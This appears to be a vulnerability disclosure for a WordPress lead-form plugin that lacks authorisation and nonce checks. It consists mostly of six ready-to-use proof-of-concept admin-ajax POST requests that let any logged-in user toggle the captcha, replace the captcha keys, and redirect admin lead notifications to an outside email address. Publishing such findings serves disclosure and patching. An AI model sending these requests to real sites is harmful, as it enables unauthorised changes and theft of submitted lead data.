The plugin doesn’t have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings
PoC POST Request (ON/OFF Captcha):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption
PoC POST Request (Captcha Settings: Site Key & Secret Key):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings
PoC POST Request (Lead Receiving Method):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings
PoC POST Request (User Email Notifications):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings
PoC POST Request (Admin Email Notifications):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings
PoC POST Request (Remember this Form):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
form_id=1&action=RememberMeThisForm